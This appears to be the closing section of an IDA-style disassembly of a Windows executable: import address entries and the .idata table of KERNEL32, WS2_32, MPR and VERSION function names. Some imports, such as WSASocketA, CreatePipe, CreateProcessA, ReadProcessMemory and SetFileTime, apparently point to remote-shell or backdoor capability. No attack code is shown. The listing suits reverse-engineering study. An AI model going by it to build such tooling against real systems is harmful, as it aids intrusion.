dword_4F64B4 dd 77E61608h ; DATA XREF: _time+17�r .text:0043BB14�r
dword_4F64B8 dd 77E778C5h ; DATA XREF: __strupr+76�r __strupr+B6�r ...
dword_4F64BC dd 77E777EFh ; DATA XREF: __strupr+62�r _tolower+2C�r ...
dword_4F64C0 dd 77E6177Ah ; DATA XREF: start+E2�r __ioinit+87�r ...
dword_4F64C4 dd 77E7C938h ; DATA XREF: start+B3�r .text:0043BB2C�r
dword_4F64C8 dd 77E7C486h ; DATA XREF: start+26�r .text:0043BB32�r
dword_4F64CC dd 77EB36A5h ; DATA XREF: sub_423320+3�r
; .text:0043BB38�r
dword_4F64D0 dd 77E79C3Dh ; DATA XREF: __CrtSetReportFile+3E�r
; __CrtSetReportFile+58�r ...
dword_4F64D4 dd 77E9BD34h ; DATA XREF: __CrtDbgReport+102�r
; __CrtDbgReport+2F3�r ...
dword_4F64D8 dd 77E79908h ; DATA XREF: __mtinitlocks+9�r
; __mtinitlocks+16�r ...
dword_4F64DC dd 77EB8503h ; DATA XREF: __lockerr_exit+9�r
; .text:0043BB50�r
dword_4F64E0 dd 77F5722Fh ; DATA XREF: sub_424440+DA�r
; sub_424440+1BB�r ...
dword_4F64E4 dd 77E79E34h ; DATA XREF: sub_424FD0+4A8�r
; sub_424FD0+545�r ...
dword_4F64E8 dd 77E7980Ah ; DATA XREF: ___sbh_alloc_new_region+A3�r
; ___sbh_alloc_new_group+A7�r ...
dword_4F64EC dd 77E7AC5Eh ; DATA XREF: sub_427AB0+5F�r
; .text:0043BB68�r
dword_4F64F0 dd 77E76E0Bh ; DATA XREF: sub_427CE0+57�r
; sub_427CE0+7C�r ...
dword_4F64F4 dd 77E7C726h ; DATA XREF: sub_427CE0+14�r
; .text:0043BB74�r
dword_4F64F8 dd 77E77CC4h ; DATA XREF: __mtinit+64�r __getptd+66�r ...
dword_4F64FC dd 77E79B39h ; DATA XREF: __mtinit+4A�r __getptd+50�r ...
dword_4F6500 dd 77E7C5B4h ; DATA XREF: __mtinit+9�r
; .text:0043BB86�r
dword_4F6504 dd 77E72B29h ; DATA XREF: __mtterm+17�r
; .text:0043BB8C�r
dword_4F6508 dd 77F51587h ; DATA XREF: __getptd+8B�r
; .text:0043BB92�r
dword_4F650C dd 77E78B61h ; DATA XREF: __getptd+15�r
; __freeptd+1C�r ...
dword_4F6510 dd 77E73163h ; DATA XREF: .text:00429F53�r
; .text:0043BB9E�r
align 8
dword_4F6518 dd 71B2ACCBh ; DATA XREF: sub_43B886�r
align 10h
dword_4F6520 dd 77C0167Dh ; DATA XREF: sub_43B910�r
dword_4F6524 dd 77C0162Dh ; DATA XREF: sub_43B916�r
dword_4F6528 dd 77C015E3h ; DATA XREF: sub_43B91C�r
align 10h
dword_4F6530 dd 71AB4122h ; DATA XREF: sub_4155FE+D4�r
; .text:0043B904�r
dword_4F6534 dd 71AB1746h ; DATA XREF: sub_413119+1DE�r
; .text:0043B8FE�r
dword_4F6538 dd 71AB401Ch ; DATA XREF: sub_413119+21B�r
; sub_413119+243�r ...
dword_4F653C dd 71AB1836h ; DATA XREF: sub_40FA71+6E�r
; sub_40FAEE+8E�r ...
dword_4F6540 dd 71AB41DAh ; DATA XREF: sub_40F43A+4A�r
; sub_40FA71+15�r ...
dword_4F6544 dd 71AB3F8Dh ; DATA XREF: sub_40F43A+5A�r
; .text:0043B8E6�r
dword_4F6548 dd 71AB155Ah ; DATA XREF: sub_40F43A+8D�r
; sub_41417E+70�r ...
dword_4F654C dd 71AB3ECEh ; DATA XREF: sub_40F43A+B5�r
; .text:0043B8DA�r
dword_4F6550 dd 71AB5A01h ; DATA XREF: sub_4156E7+20�r
; .text:0043B90A�r
dword_4F6554 dd 71AB868Dh ; DATA XREF: sub_40F43A+171�r
; .text:0043B8CE�r
dword_4F6558 dd 71AB2BBFh ; DATA XREF: .text:0040EB4A�r
; .text:0043B8C8�r
dword_4F655C dd 71AB12F8h ; DATA XREF: sub_40E907+27�r
; sub_40EA49+27�r ...
dword_4F6560 dd 71AB1746h ; DATA XREF: sub_40E907+36�r
; sub_40EA49+36�r ...
dword_4F6564 dd 71AB3E5Dh ; DATA XREF: sub_40E907+59�r
; sub_40EA49+59�r ...
dword_4F6568 dd 71AB5690h ; DATA XREF: sub_40E907+6A�r
; sub_40EA49+6A�r ...
dword_4F656C dd 71AB1A6Dh ; DATA XREF: sub_40E907+E0�r
; sub_40EA49+E0�r ...
dword_4F6570 dd 71AB3C22h ; DATA XREF: sub_40DB44+AF�r
; sub_40E907+45�r ...
dword_4F6574 dd 71AB1AF4h ; DATA XREF: sub_40D871+12�r
; sub_40E907+C3�r ...
dword_4F6578 dd 71AB1890h ; DATA XREF: sub_40D6D3+4C�r
; sub_40F43A+106�r ...
dword_4F657C dd 71AB1B7Bh ; DATA XREF: sub_43B892�r
dword_4F6580 dd 71AB157Eh ; DATA XREF: sub_401CC7+2FB5�r
; .text:0043B88C�r
dword_4F6584 dd 71AB5DE2h ; DATA XREF: sub_40F43A+C9�r
; .text:0043B8D4�r
dd 0
dd 4E570006h, 64417465h, 6E6F4364h, 7463656Eh, 326E6F69h
dd 504D0041h, 6C642E52h, 41006Ch, 53415357h, 656B636Fh
dd 4174h, 5F325357h, 642E3233h, 6C6Ch, 6556000Ah, 65755172h
dd 61567972h, 4165756Ch, 0
aGetfileversion db 'GetFileVersionInfoA',0
db 1
align 2
aGetfileversi_0 db 'GetFileVersionInfoSizeA',0
aVersion_dll db 'VERSION.dll',0
db '',0
aExitprocess db 'ExitProcess',0
a4_0 db '4',0
aClosehandle db 'CloseHandle',0
aF_2 db 'f',0
aCreateprocessa db 'CreateProcessA',0
align 10h
db 7Dh ; }
db 1, 47h, 65h
aTmodulefilenam db 'tModuleFileNameA',0
align 2
dw 1C1h
aGetsystemdirec db 'GetSystemDirectoryA',0
db 56h ; V
db 3, 53h, 6Ch
db 65h ; e
db 65h, 70h, 0
db 6Fh ; o
align 2
aCreatethread db 'CreateThread',0
align 4
aG_1 db '',0
aDeletefilea db 'DeleteFileA',0
dw 286h
aOpenprocess db 'OpenProcess',0
db 43h ; C
db 1, 47h, 65h
aTcurrentproces db 'tCurrentProcessId',0
dw 171h
aGetlasterror db 'GetLastError',0
align 2
aC_8 db 'C',0
aCopyfilea db 'CopyFileA',0
dw 319h
aSetfileattribu db 'SetFileAttributesA',0
align 4
db 5Eh ; ^
db 1, 47h, 65h
aTfileattribute db 'tFileAttributesA',0
align 2
dw 17Fh
aGetmodulehandl db 'GetModuleHandleA',0
align 2
dw 390h
aWaitforsingleo db 'WaitForSingleObject',0
db '`',0
aCreatemutexa db 'CreateMutexA',0
align 4
db 0DFh ;
db 1, 47h, 65h
aTtickcount db 'tTickCount',0
align 4
db 5Fh ; _
db 3, 54h, 65h
aRminatethread db 'rminateThread',0
dw 1D5h
aGettemppatha db 'GetTempPathA',0
align 2
dw 26Eh
aMovefilea db 'MoveFileA',0
dw 252h
aLoadlibrarya db 'LoadLibraryA',0
align 2
dw 1A0h
aGetprocaddress db 'GetProcAddress',0
align 4
db 14h
db 1, 47h, 65h
aTcomputernamea db 'tComputerNameA',0
align 4
db 74h ; t
db 1, 47h, 65h
aTlocaleinfoa db 'tLocaleInfoA',0
align 2
dw 1E9h
aGetversionexa db 'GetVersionExA',0
db '',0
aExitthread db 'ExitThread',0
align 4
db 51h ; Q
db 2, 4Ch, 65h
aAvecriticalsec db 'aveCriticalSection',0
align 4
aS_41 db '',0
aEntercriticals db 'EnterCriticalSection',0
align 4
db 24h ; $
db 2, 49h, 6Eh
aItializecritic db 'itializeCriticalSectionAndSpinCount',0
aB_1 db '',0
aDeletecritical db 'DeleteCriticalSection',0
db 0A4h ;
db 3, 57h, 72h
aItefile db 'iteFile',0
aO_1 db 'O',0
aCreateeventa db 'CreateEventA',0
align 4
db 0B5h ;
db 2, 52h, 65h
aAdfile db 'adFile',0
align 4
aS_42 db 'S',0
aCreatefilea db 'CreateFileA',0
dw 35Eh
aTerminateproce db 'TerminateProcess',0
align 2
aU_1 db '',0
aDuplicatehandl db 'DuplicateHandle',0
db 42h ; B
db 1, 47h, 65h
aTcurrentproc_0 db 'tCurrentProcess',0
aE_1 db 'e',0
aCreatepipe db 'CreatePipe',0
align 2
dw 1E0h
aGettimeformata db 'GetTimeFormatA',0
align 4
db 47h ; G
db 1, 47h, 65h
aTdateformata db 'tDateFormatA',0
align 2
dw 163h
aGetfilesize db 'GetFileSize',0
db '',0
aFindclose db 'FindClose',0
db '',0
aFiletimetosyst db 'FileTimeToSystemTime',0
align 10h
db '',0
aFiletimetoloca db 'FileTimeToLocalFileTime',0
db '',0
aFindnextfilea db 'FindNextFileA',0
db '',0
aFindfirstfilea db 'FindFirstFileA',0
align 4
dd 6553031Bh, 6C694674h, 696F5065h, 7265746Eh, 2EE0000h
aSetconsolectrl db 'SetConsoleCtrlHandler',0
dw 38Eh
aWaitformulti_0 db 'WaitForMultipleObjects',0
align 10h
db 0FCh ;
align 2
aGenerateconsol db 'GenerateConsoleCtrlEvent',0
align 4
db 73h ; s
db 1, 47h, 65h
aTlocaltime db 'tLocalTime',0
align 4
db 0A3h ;
db 2, 51h, 75h
aEryperformance db 'eryPerformanceCounter',0
dw 2A4h
aQueryperform_1 db 'QueryPerformanceFrequency',0
dw 0F8h
aFreelibrary db 'FreeLibrary',0
db 59h ; Y
db 1, 47h, 65h
aTenvironmentva db 'tEnvironmentVariableW',0
dw 216h
aHeapfree db 'HeapFree',0
align 2
dw 210h
aHeapalloc db 'HeapAlloc',0
dw 1A3h
aGetprocessheap db 'GetProcessHeap',0
align 4
dd 69560389h, 61757472h, 6575516Ch, 78457972h, 2B80000h
aReadprocessmem db 'ReadProcessMemory',0
dw 1C5h
aGetsysteminfo db 'GetSystemInfo',0
dw 0F3h
aFormatmessagea db 'FormatMessageA',0
align 4
db 0Ah
db 2, 47h, 6Ch
aObalunlock db 'obalUnlock',0
align 4
db 3
db 2, 47h, 6Ch
aOballock db 'obalLock',0
align 2
dw 371h
aUnmapviewoffil db 'UnmapViewOfFile',0
db 68h ; h
db 2, 4Dh, 61h
aPviewoffile db 'pViewOfFile',0
aT_1 db 'T',0
aCreatefilemapp db 'CreateFileMappingA',0
align 2
dw 31Fh
aSetfiletime db 'SetFileTime',0
dd 65470165h, 6C694674h, 6D695465h, 0BC0065h
aExpandenvironm db 'ExpandEnvironmentStringsA',0
dw 394h
aWidechartomult db 'WideCharToMultiByte',0
db 75h ; u
db 2, 4Dh, 75h
aLtibytetowidec db 'ltiByteToWideChar',0
dw 3C3h
aLstrcmpia db 'lstrcmpiA',0
dw 15Ah
aGetexitcodepro db 'GetExitCodeProcess',0
align 4
db 91h ;
db 2, 50h, 65h
aEknamedpipe db 'ekNamedPipe',0
db 78h ; x
db 1, 47h, 65h
aTlogicaldrives db 'tLogicalDrives',0
align 4
db 4
db 2, 47h, 6Ch
aObalmemorystat db 'obalMemoryStatus',0
align 2
dw 236h
aIsbadwriteptr db 'IsBadWritePtr',0
dw 233h
aIsbadreadptr db 'IsBadReadPtr',0
align 2
dw 220h
aHeapvalidate db 'HeapValidate',0
align 2
dw 2D7h
aRtlunwind db 'RtlUnwind',0
dw 1E2h
aGettimezoneinf db 'GetTimeZoneInformation',0
align 4
db 0C8h ;
db 1, 47h, 65h
aTsystemtime db 'tSystemTime',0
db 28h ; (
db 2, 49h, 6Eh
aTerlockeddecre db 'terlockedDecrement',0
align 10h
db 2Ch ; ,
db 2, 49h, 6Eh
aTerlockedincre db 'terlockedIncrement',0
align 4
db 0B7h ;
db 1, 47h, 65h
aTstartupinfoa db 'tStartupInfoA',0
dw 110h
aGetcommandline db 'GetCommandLineA',0
db 0E8h ;
db 1, 47h, 65h
aTversion db 'tVersion',0
align 2
db 'x',0
aDebugbreak db 'DebugBreak',0
align 4
db 0B9h ;
db 1, 47h, 65h
aTstdhandle db 'tStdHandle',0
align 4
db 8Dh ;
db 2, 4Fh, 75h
aTputdebugstrin db 'tputDebugStringA',0
align 2
dw 223h
aInitializecrit db 'InitializeCriticalSection',0
db '',0
aFatalappexita db 'FatalAppExitA',0
dw 21Ah
aHeaprealloc db 'HeapReAlloc',0
dd 69560383h, 61757472h, 6572466Ch, 3810065h, 74726956h
dd 416C6175h, 636F6C6Ch, 1580000h
aGetenvironment db 'GetEnvironmentVariableA',0
db 14h
db 2, 48h, 65h
aApdestroy db 'apDestroy',0
dw 212h
aHeapcreate db 'HeapCreate',0
align 4
db 46h ; F
db 1, 47h, 65h
aTcurrentthread db 'tCurrentThreadId',0
align 2
dw 366h
aTlssetvalue db 'TlsSetValue',0
db 63h ; c
db 3, 54h, 6Ch
aSalloc db 'sAlloc',0
align 4
db 64h ; d
db 3, 54h, 6Ch
aSfree db 'sFree',0
dw 328h
aSetlasterror db 'SetLastError',0
align 2
dw 365h
aTlsgetvalue db 'TlsGetValue',0
db 45h ; E
db 1, 47h, 65h
aTcurrentthre_0 db 'tCurrentThread',0
align 4
db 4
db 1, 47h, 65h
aTcpinfo db 'tCPInfo',0
db 0FDh ;
align 2
aGetacp db 'GetACP',0
align 2
dw 193h
aGetoemcp db 'GetOEMCP',0
align 2
dw 2A7h
aRaiseexception db 'RaiseException',0
align 4
db 44h ; D
db 2, 4Ch, 43h
aMapstringa db 'MapStringA',0
align 4
db 45h ; E
db 2, 4Ch, 43h
aMapstringw db 'MapStringW',0
align 4
db 6Eh ; n
db 3, 55h, 6Eh
aHandledexcepti db 'handledExceptionFilter',0
align 4
db 0F6h ;
align 2
aFreeenvironmen db 'FreeEnvironmentStringsA',0
dw 0F7h
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
db 55h ; U
db 1, 47h, 65h
aTenvironmentst db 'tEnvironmentStrings',0
db 57h ; W
db 1, 47h, 65h
aTenvironment_0 db 'tEnvironmentStringsW',0
align 2
dw 324h
aSethandlecount db 'SetHandleCount',0
align 10h
dd 65470166h, 6C694674h, 70795465h, 3370065h, 53746553h
dd 61486474h, 656C646Eh, 0EE0000h, 73756C46h, 6C694668h
dd 66754265h, 73726566h, 1BA0000h, 53746547h, 6E697274h
dd 70795467h, 4165h, 654701BDh, 72745374h, 54676E69h, 57657079h
dd 34A0000h
aSetunhandledex db 'SetUnhandledExceptionFilter',0
dd 73490230h, 43646142h, 5065646Fh, 7274h, 73490241h, 696C6156h
dd 636F4C64h, 656C61h, 7349023Fh, 696C6156h, 646F4364h
dd 67615065h, 0AF0065h
aEnumsystemloca db 'EnumSystemLocalesA',0
align 4
db 0E3h ;
db 1, 47h, 65h
aTuserdefaultlc db 'tUserDefaultLCID',0
align 2
dw 310h
aSetendoffile db 'SetEndOfFile',0
align 2
dw 175h
aGetlocaleinfow db 'GetLocaleInfoW',0
align 4
db ':',0
aComparestringa db 'CompareStringA',0
align 2
db ';',0
aComparestringw db 'CompareStringW',0
align 4
db 13h
db 3, 53h, 65h
aTenvironment_1 db 'tEnvironmentVariableA',0
aKernel32_dll_0 db 'KERNEL32.dll',0
align 10h
_idata ends
; Section 6. (virtual address 000FD000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 000FC400
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 4FD000h
align 2000h
_idata2 ends
end start